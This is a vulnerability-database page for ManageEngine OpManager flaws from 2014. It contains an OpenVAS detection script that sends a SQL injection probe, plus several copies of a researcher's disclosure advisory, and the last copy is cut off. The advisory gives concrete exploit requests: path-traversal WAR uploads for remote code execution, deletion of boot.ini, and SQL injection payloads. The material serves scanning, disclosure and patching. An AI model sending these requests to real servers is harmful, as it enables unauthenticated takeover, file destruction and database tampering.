ManageEngine OpManager Multiple Vulnerabilities Nov14

2014-11-24T00:00:00

Description

This host is installed with ManageEngine OpManager and is prone to multiple vulnerabilities.

{"id": "OPENVAS:1361412562310805103", "type": "openvas", "bulletinFamily": "scanner", "title": "ManageEngine OpManager Multiple Vulnerabilities Nov14", "description": "This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "published": "2014-11-24T00:00:00", "modified": "2020-04-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805103", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/35209", "https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability", "https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix"], "cvelist": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"], "lastseen": "2020-04-16T16:53:27", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1905", "CPAI-2015-0559", "CPAI-2015-0963"]}, {"type": "cve", "idList": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"]}, {"type": "dsquare", "idList": ["E-404", "E-406", "E-407"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128474", "PACKETSTORM:129037"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31197", "SECURITYVULNS:DOC:31461", "SECURITYVULNS:VULN:14008", "SECURITYVULNS:VULN:14113"]}, {"type": "seebug", "idList": ["SSV:87404"]}, {"type": "zdi", "idList": ["ZDI-15-139", "ZDI-15-140", "ZDI-15-141", "ZDI-15-142", "ZDI-15-144", "ZDI-15-145"]}, {"type": "zdt", "idList": ["1337DAY-ID-22843", "1337DAY-ID-29642"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2015-0963"]}, {"type": "cve", "idList": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"]}, {"type": "dsquare", "idList": ["E-407"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129037"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31197"]}, {"type": "seebug", "idList": ["SSV:87404"]}, {"type": "zdi", "idList": ["ZDI-15-142"]}, {"type": "zdt", "idList": ["1337DAY-ID-29642"]}]}, "exploitation": null, "vulnersScore": 0.1}, "pluginID": "1361412562310805103", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ManageEngine OpManager Multiple Vulnerabilities Nov14\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805103\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_cve_id(\"CVE-2014-7866\", \"CVE-2014-7868\", \"CVE-2014-6035\");\n script_bugtraq_id(71001, 71002);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-24 16:16:10 +0530 (Mon, 24 Nov 2014)\");\n script_name(\"ManageEngine OpManager Multiple Vulnerabilities Nov14\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - /servlet/MigrateLEEData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. '../') supplied via the 'fileName' parameter.\n\n - /servlet/MigrateCentralData script not properly sanitizing user input, specifically path traversal style attacks\n (e.g. '../') supplied via the 'zipFileName' parameter.\n\n - /servlet/APMBVHandler script not properly sanitizing user-supplied input to the 'OPM_BVNAME' POST parameter.\n\n - /servlet/DataComparisonServlet script not properly sanitizing user-supplied input to the 'query' POST\n parameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to upload arbitrary files and\n execute the script within the file with the privileges of the web server, manipulate SQL queries in the backend\n database, and disclose certain sensitive information.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine OpManager version 11.3/11.4\");\n\n script_tag(name:\"solution\", value:\"Apply the patches from the referenced links\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35209\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_consolidation.nasl\");\n script_mandatory_keys(\"manageengine/opmanager/http/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(port: port, cpe: CPE))\n exit(0);\n\ndata = \"OPERATION_TYPE=Delete&OPM_BVNAME=aaa'; SELECT PG_SLEEP(1)--\";\nurl = \"/servlet/APMBVHandler\";\n\nreq = http_post_put_req(port: port, url: url, data: data,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Action=BV_DELETED\" >< res && \"SELECT PG_SLEEP(1)--\" >< res && \"Result=Success\" >< res &&\n \"Result=Failure\" >!< res) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659976447, "score": 1659977168}, "_internal": {"score_hash": "d3c2d7132f3e19daaa95afe3debcbbdf"}}

{"zdt": [{"lastseen": "2018-03-14T14:37:35", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29642", "href": "https://0day.today/exploit/description/29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/29642", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-28T01:37:12", "description": "ManageEngine OpManager, Social IT Plus, and IT360 suffer from code execution, remote shell upload, and remote SQL injection vulnerabilities.", "cvss3": {}, "published": "2014-11-10T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-10T00:00:00", "id": "1337DAY-ID-22843", "href": "https://0day.today/exploit/description/22843", "sourceData": "This time we have a file upload leading to remote code execution and a\r\nblind SQL injection in ManageEngine OpManager, Social IT Plus and\r\nIT360.\r\nManageEngine have released an emergency fix, see details in the\r\nadvisory below. The proper fixed version will be 11.5, which will come\r\nout at the end of the year.\r\n\r\nI had already released a Metasploit exploit for RCE back in September\r\n[2], which also had an emergency fix and will only be properly fixed\r\nin 11.5, so there is no point in updating the exploit. This is just\r\nanother vector that ManageEngine have plugged while we wait for the\r\nrelease of 11.5. Note that this is all for OpManager. No indication\r\nwas given of when Social IT or IT360 will updated with the security\r\nfixes. However the emergency patches be applied to all applications.\r\n\r\nAnyway details are below, and I have updated the full text advisory in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration.\"\r\n\r\n\r\n>> Technical details:\r\n\r\n(#1 and #2 were previously released in September, see [2])\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\n\n# 0day.today [2018-02-27] #", "sourceHref": "https://0day.today/exploit/22843", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-11-09T00:00:00", "title": "ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "id": "EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF", "href": "", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\n#1\nVulnerability: Remote code execution via WAR file upload\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nCVE-2014-6034\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\n<... WAR file payload ...>\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\nA Metasploit module that exploits this vulnerability has been released.\n\nb)\nCVE-2014-6035\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\n<... WAR file payload ...>\n\nAffected versions: OpManager v? to v11.4\n\n\n#2\nVulnerability: Arbitrary file deletion\nCVE-2014-6036\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\n\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\n\n\n#3\nVulnerability: Remote code execution via file upload\nCVE-2014-7866\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\nb)\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\n\n#4\nVulnerability: Blind SQL injection\nCVE-2014-7868\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\nb)\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\n\n>> Fix:\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\nResolves #1 and #2\n\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\nResolves #3\n\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\nResolves #4\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:10:14", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87404", "id": "SSV:87404", "sourceData": "\n >> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n \r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n \r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n \r\n \r\n>> Technical details:\r\n \r\n(#1 and #2 were previously released in September, see [2])\r\n \r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n \r\n \r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\n \r\n[2]\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n \r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87404", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "description": "\r\n\r\nHi,\r\n\r\nThis is the 8th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have a file upload leading to remote code execution and a\r\nblind SQL injection in ManageEngine OpManager, Social IT Plus and\r\nIT360.\r\nManageEngine have released an emergency fix, see details in the\r\nadvisory below. The proper fixed version will be 11.5, which will come\r\nout at the end of the year.\r\n\r\nI had already released a Metasploit exploit for RCE back in September\r\n[2], which also had an emergency fix and will only be properly fixed\r\nin 11.5, so there is no point in updating the exploit. This is just\r\nanother vector that ManageEngine have plugged while we wait for the\r\nrelease of 11.5. Note that this is all for OpManager. No indication\r\nwas given of when Social IT or IT360 will updated with the security\r\nfixes. However the emergency patches be applied to all applications.\r\n\r\nAnyway details are below, and I have updated the full text advisory in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service 